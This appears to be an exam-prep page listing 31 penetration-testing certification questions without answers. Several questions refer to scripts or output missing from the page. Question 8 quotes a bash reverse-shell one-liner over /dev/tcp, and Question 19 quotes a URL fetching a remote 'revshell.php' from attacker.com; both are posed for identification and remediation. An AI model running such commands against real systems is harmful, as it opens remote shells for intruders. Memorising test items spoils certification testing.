MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
Question2: Given the following Python script:Which of the following is where the output will go?
Question3: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:IP: 192.168.1.20NETMASK: 255.255.255.0DEFAULT GATEWAY: 192.168.1.254DHCP: 192.168.1.253DNS: 192.168.10.10, 192.168.20.10Which of the following commands should the malicious user execute to perform the MITM attack?
Question4: Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?
Question5: Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.Which of the following BEST describes the reasoning for this?
Question6: A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
Question7: A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?
Question8: The following line was found in an exploited machine's history file. An attacker ran the following command:bash -i >& /dev/tcp/192.168.0.1/80 0> &1Which of the following describes what the command does?
Question9: An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
Question10: A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
Question11: After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass."-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepassUsing "strings" to print ASCII printable characters from changepass, the tester notes the following:$ strings changepassexitsetuidstrcmpGLIBC_2.0ENV_PATH% s/changepwmallocstrlenGiven this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
Question12: An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
Question13: During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
Question14: Black box penetration testing strategy provides the tester with:
Question15: A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
Question16: A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
Question17: A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
Question18: Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
Question19: While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
Question20: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
Question21: A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).
Question22: A penetration tester is reviewing the following output from a wireless sniffer:Which of the following can be extrapolated from the above information?
Question23: Which of the following is an example of a spear phishing attack?
Question24: A penetration tester executes the following commands:Which of the following is a local host vulnerability that the attacker is exploiting?
Question25: Which of the following is the reason why a penetration tester would run the chkconfig --del servicenamecommand at the end of an engagement?
Question26: A security consultant is trying to attack a device with a previously identified user account.Which of the following types of attacks is being executed?
Question27: A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
Question28: A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses.Which of the following is the MOST efficient to utilize?
Question29: A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
Question30: A penetration tester observes that several high-numbered ports are listening on a public web server.However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?
Question31: A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?